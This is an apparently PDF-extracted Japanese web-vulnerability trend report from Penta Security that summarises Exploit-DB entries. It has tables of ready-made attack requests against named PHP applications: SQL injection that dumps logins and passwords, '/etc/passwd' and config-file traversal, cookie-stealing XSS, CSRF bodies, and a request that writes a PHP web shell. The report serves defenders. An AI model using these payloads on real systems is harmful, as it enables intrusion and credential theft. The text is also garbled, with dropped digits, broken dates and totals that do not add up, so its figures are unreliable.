itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

04.0

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 EDB-Report 最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です サマリー ペンタセキュリティシステムズ 株 式 会 社 R&Dセンター データセキュリティチーム 04 年 月 は Exploit-DBより 公 開 されている 脆 の 中 SQL Injection クロスサイト 要 求 偽 造 (Cross Site Request Forgery:CSRF) ローカルファイル 挿 入 (Local File Inclusion:LFI)のような 代 表 的 な 攻 撃 が 多 く 見 られた 月 です 攻 撃 実 行 の 難 易 度 は 易 と 判 断 されるパターンが 多 いものの 危 険 度 は 高 と 分 類 されるパターンが69% 早 急 対 応 要 と 分 類 されるパターンが6% 見 られ 簡 単 に 実 行 できる 攻 撃 パターンでクリティカル な 被 害 を 及 ぼす 可 能 性 があるため 管 理 者 は 格 別 な 注 意 を 払 う 必 要 があります 主 なソフトウェア 別 脆 ではの 脆 が 多 く 報 告 されているため 同 ソフトウェアを 利 用 しているお 客 様 は 報 告 されている 脆 に 対 応 可 能 な 最 新 バージョンでパッチをし 対 応 することを 推 奨 致 します. 脆 別 件 数 脆 カテゴリ 件 数 SQLインジェクション (SQL Injection) 7 ローカル ファイル 挿 入 (Local File Inclusion:LFI) 9 クロスサイト 要 求 偽 造 (Cross Site Request Forgery:CSRF) 7 クロス サイト スクリプティング 5 (Cross Site Scripting:XSS) クッキー 偽 造 (Cookie Poisoning) 合 計 39 8 6 4 0 8 6 4 0 7 9 脆 別 件 数 7 5. 危 険 度 別 件 数 危 険 度 件 数 割 合 早 急 対 応 要 0 6% 高 7 69% 中 5% 合 計 39 00% 危 険 度 別 件 数 0 早 急 対 応 要 高 中 7 3. 攻 撃 実 行 の 難 易 度 別 件 数 難 易 度 件 数 割 合 難 0 6% 中 7 69% 易 5% 合 計 39 00% 攻 撃 実 行 の 難 易 度 別 件 数 0 7 難 中 易 4. 主 なソフトウェア 別 脆 発 生 件 数 ソフトウェア 名 itechclassifieds Middle School Page Horizon QCMS myseatxt 0.34 Joomla JV Comment Extension PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 合 計 件 数 3 39 4 0 8 6 4 0 主 なソフトウェア 別 脆 発 生 件 数 3 itechclassifieds Middle School Page Horizon QCMS myseatxt 0.34 Joomla JV Comment Extension PizzaInn_Project 危 険 度 分 類 基 準 早 急 対 応 要 : 攻 撃 が 成 功 した 場 合 システムへ 侵 入 可 高 :システム 情 報 を 取 得 するか あるいはクライアントに 次 被 害 を 及 ぼす 中 : 情 報 漏 洩 攻 撃 実 行 難 易 度 分 類 基 準 難 : 複 数 の 脆 を 突 いた 攻 撃 パターン 対 象 のシステムの 重 要 な 情 報 を 取 得 するため 高 度 な 攻 撃 コードを 採 用 したパターン 知 らされていない 攻 撃 コードを 採 用 したパターンのいずれかに 該 当 する 中 : 攻 撃 手 法 自 体 は 難 しくないが 迂 回 コードを 採 用 したパターン 易 : 回 のリクエストで 攻 撃 が 成 立 するパターン 複 数 回 トライするも 既 知 の 攻 撃 コードを 採 用 したパターンのいずれかに 該 当 する Copyright 04 Penta Security Systems Inc. All rights reserved

最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です ** 5 件 以 上 発 生 した 主 なソフトウェア 別 脆 の 詳 細 情 報 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 ソフトウェア 名 3093 SQL 中 高 Event Calendar - load-calendar.php SQL 3093 CSRF 易 高 Event Calendar - load-calendar.php SQL 309 XSS 易 高 Car Rental Script - index.php XSS 脆 309 CSRF 易 高 Appointment Scheduler.0 - index.php CSRF 脆 309 LFI 易 高 Appointment Scheduler.0 - index.php LFI 脆 3090 CSRF 易 高 Appointment Scheduler.0 - index.php CSRF 脆 30955 CSRF 易 高 Rental Script - index.php CSRF 脆 30955 LFI 易 高 Rental Script - index.php LFI 脆 30954 LFI 易 高 Hotel System - index.php LFI 脆 30954 CSRF 易 高 Hotel System - index.php CSRF 脆 30953 CSRF 易 高 Packages Listing - index.php CSRF 脆 30953 LFI 易 高 Packages Listing - index.php LFI 脆 30950 CSRF 易 高 Pet Listing Script - index.php CSRF 脆 Copyright 04 Penta Security Systems Inc. All rights reserved

日 付 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 攻 撃 コード 対 象 プログラム 対 象 環 境 04//4 30689 SQL Injection 易 早 急 対 応 要 Taboada Macronews news_group.php SQL EDB-Report 最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です /news_popup.php?id='%0union%0all%0s ELECT%0,,3,concat('a','b','c')--%0 Taboada Macronews Taboada Macronews V.0 04//7 30790 SQL Injection 易 早 急 対 応 要 Cubic CMS agent.php SQL /agent.php?resource_id=- OR 'foobar' UNION SELECT user()-- cms 04//7 30790 LFI 易 高 04//7 30786 SQL Injection 易 早 急 対 応 要 04//7 30786 XSS 易 中 04//4 3097 LFI 易 高 04//4 3097 SQL Injection 易 早 急 対 応 要 Cubic CMS agent.php LFI 脆 Middle School Page - View.php SQL Middle School Page - View.php XSS 脆 弱 性 Horizon QCMS - d- load.php LFI 脆 Horizon QCMS - download.php SQL /agent.php?path=/../../application/config/project.ini /view.php?class=null+and+=+union+select+,concat(name,0x3a,pass)+from+teachinfo /view.php?class=<script>alert(document.cookie) ;</script> /d-load.php?start=../../config.php /download.php?category=%7%0union%0sel ect%0,,version(),4,5,6%0--%0 Middle School Page Middle School Page cms Middle School Page.3 Beta Middle School Page.3 Beta Horizon QCMS Horizon QCMS 4.0 Horizon QCMS Horizon QCMS 4.0 04//4 3096 Cookie Poisoning 04//4 3093 SQL Injection 中 高 04//4 3093 CSRF 易 高 04//4 309 XSS 易 高 易 高.8. - login.php SQL Event Calendar - loadcalendar.php SQL Injection 脆 Event Calendar - loadcalendar.php SQL Injection 脆 Car Rental Script - index.php XSS 脆 GET /login.php HTTP/. Cookie: burden_user_rememberme=; /loadcalendar.php?view=&month=6&year=03&cid =+and+substring(@@version,,)=4 /index.php?controller=adminevents&action=crea te HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 event_create=&category_id=&event_title=<sc ript>alert(document.cookie);</script>&event_de scription=&event_max_people=&event_colo r=ffcc00&start[]=04-0- 00:00&end[]=04-0- 00:00&title[]=Regular price&price[]=888&repeat_every=&repeat_ends =04-0- /index.php?controller=admins&action=in dex&p_date=<script>alert(document.cookie);</ script>.8. Event Calendar.0 Event Calendar.0 Car Rental Script 04//4 309 CSRF 易 高 Appointment Scheduler.0 - index.php CSRF 脆 /index.php?controller=pjadminservices&action= pjactioncreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Appointmen t Scheduler.0 service_create=&i8n[][name]=<script>alert( document.cookie);</script>&i8n[][description ]=Iphobos Blog&price=00&length=&before=&after=&t otal=3&is_active= 04//4 309 LFI 易 高 Appointment Scheduler.0 - index.php LFI 脆 Download&id=../../../../../app/config/db.inc.php Appointmen t Scheduler.0 Copyright 04 Penta Security Systems Inc. All rights reserved

最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です 日 付 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 攻 撃 コード 対 象 プログラム 対 象 環 境 04//4 3090 CSRF 易 高 Job Listing Script - index.php CSRF 脆 /index.php?controller=admincategories&action= create HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Job Listing Script category_create=iphobos Blog&category_title=<script>alert(document.coo kie);</script> 04//5 30955 CSRF 易 高 Rental Script - index.php CSRF 脆 /index.php?controller=pjadminfeatures&action= pjactioncreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Rental Script 3.0 feature_create=&i8n[][name]=<script>alert (document.cookie);</script>&i8n[3][name]=&i 8n[][name]= 04//5 30955 LFI 易 高 04//5 30954 LFI 易 高 Rental Script - index.php LFI 脆 Hotel System - index.php LFI 脆 Download&id=../../../../../../../../etc/passwd Download&id=../../../../../../../../etc/passwd Rental Script 3.0 Hotel System 3.0 04//5 30954 CSRF 易 高 Hotel System - index.php CSRF 脆 /index.php?controller=pjadminrooms&action=pj ActionCreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Hotel System 3.0 room_create=&i8n[][name]=<script>alert(d ocument.cookie);</script>&i8n[3][name]=&i8 n[][name]=&i8n[][description]=iphobos&i8 n[3][description]=&i8n[][description]=&adults =&children=0&cnt= 04//5 30953 CSRF 易 高 Packages Listing - index.php CSRF 脆 /index.php?controller=pjadmincountries&action =pjactioncreate HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Packages Listing.0 country_create=&i8n[][name]=<script>alert (document.cookie);</script>&i8n[3][name]=&i 8n[][name]= 04//5 30953 LFI 易 高 Packages Listing - index.php LFI 脆 Download&id=../../../../../../../../etc/passwd Packages Listing.0 Copyright 04 Penta Security Systems Inc. All rights reserved

最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です 日 付 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 攻 撃 コード 対 象 プログラム 対 象 環 境 04//5 30950 CSRF 易 高 Pet Listing Script - index.php CSRF 脆 /index.php?controller=adminbreeds&action=crea te HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Pet Listing Script.0 breed_create=&breed_title=<script>alert(docu ment.cookie);</script>&type_id= 04//5 30946 SQL Injection 難 早 急 対 応 要. - managetimetracker.php SQL /managetimetracker.php?action=projectpdf&id= %0and(select%0%0from(select%0count( *),concat((select%0(select%0(select%0dis tinct%0concat(0x7e,0x7,cast(schema_name% 0as%0char),0x7,0x7e)%0FROM%0inform ation_schema.schemata%0limit 0,))%0from%0information_schema.tables% 0limit 0,),floor(rand(0)*))x%0from%0information _schema.tables%0group%0by%0x)a)%0an d%0=. 04//3 3087 SQL Injection 中 早 急 対 応 要 <= v0.83 - indexdate.php SQL /indexdate.php?ids=77%0union%0select% 0,,3,loginUtilisateur,5,6,passUtilisateur,8,9, 0,,,3,4,5%0from%0domphp_utilisate urs--%0 <= v0.83 04//7 305 SQL Injection 易 早 急 対 応 要 0.5.0 - index.php SQL Injection 脆 /index.php?login=true HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 bloofox CMS 0.5.0 login=login&password=iphobos&username= %0or%0=--%0 04//7 305 LFI 易 高 0.5.0 - index.php LFI 脆 /index.php?mode=settings&page=editor HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 bloofox CMS 0.5.0 file=<?php%0system($_get[cmd]);%0?>$fil eurl=languages/deutsch.php&fileurl=../language s/deutsch.php$send=save 04// 30865 LFI 易 高 <= v0.83 - index.php LFI 脆 /index.php?urlancien=&url=../../ <= v0.83 04//0 3085 XSS 易 高 - index.php XSS 脆 /index.php?action=showprofile&profile=<script> alert('dr.nano')</script> 04//3 346 XSS 易 中 3.3 - errmsg.php XSS 脆 /errmsg.php?msg=%3c%fp%3e%3cscript%3e alert%8%7xss%7%9%3b%3c%fscript% 3E%3Cp%3E 3.3 04//3 346 SQL Injection 易 早 急 対 応 要 04//3 344 SQL Injection 易 高 3.3 - user.php /user.php?pcid=%0or%0=--%0 SQL myseatxt 0.34 - /autocomplete_res.php?term=99%7%0or%0 autocomplete_res.php SQL =--%0 myseatxt 0.34 3.3 myseatxt 0.34 04//3 343 SQL Injection 易 高 PizzaInn_Project - reserveexec.php SQL Injection 脆 /reserve-exec.php?id=%7%0or%0=-- %0 PizzaInn_Proj ect PizzaInn_Pr oject Copyright 04 Penta Security Systems Inc. All rights reserved

最 新 Web 脆 トレンドレポート(04.0) 04.0.0~04.0.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた 脆 トレンド 情 報 です 日 付 EDB 番 号 脆 カテゴリ 攻 撃 難 易 度 危 険 度 脆 名 攻 撃 コード 対 象 プログラム 対 象 環 境 04//3 34 SQL Injection 易 早 急 対 応 要 Simple e-document.3 - login.php SQL Injection 脆 /login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 Simple e- document Simple e- document.3 username=- 473%7+OR+%8708%3D708%9%3&pa ssword=&op=login&submit=login 04//3 34 SQL Injection 易 高 godontologico 5 - index_ajax.php SQL /index_ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 godontologico 5 godontologi co 5 usuario=%0or%0=&senha=%70%6%73 %73&login=%4C%6F%67%69%6E 04//3 340 SQL Injection 易 高 itechclassifieds 3.03.057 - ChangeEmail.php SQL /ChangeEmail.php?PreviewNum=%7union% 0select%0null,null--%0 itechclassifie ds itechclassif ieds 3.03.057 04//3 340 SQL Injection 易 高 itechclassifieds 3.03.057 - ViewCat.php SQL Injection 脆 /ViewCat.php?CatID=%0or%0=--%0 itechclassifie ds itechclassif ieds 3.03.057 04//4 375 SQL Injection 難 早 急 対 応 要 Joomla JV Comment Extension 3.0. - index.php SQL Injection 脆 /index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; Chrome/6.0.9.75 Safari/535.7 option=com_jvcomment&task=comment.like&id =%0AND%0=(select%0min(@a:=)from %0(select%0%0union%0select%0)k% 0group%0by%0(select%0concat(@@version, 0x0,@a:=(@a+)%))) Joomla JV Comment Extension Joomla JV Comment Extension 3.0. 04//4 373 LFI 易 高..3 - index.php LFI 脆 /index.php?action=view&script=%f..%f..%fe tc/passwd..3 04//4 373 XSS 易 高..3 - session.php XSS 脆 /session.php?<script>alert(%7xss%7)</scrip t>..3 04//4 37 SQL Injection 易 高..3 - redirect.php SQL /redirect.php?action=url&goto=%0or%0= --%0 XOS XOS Shop.0 rc7o Copyright 04 Penta Security Systems Inc. All rights reserved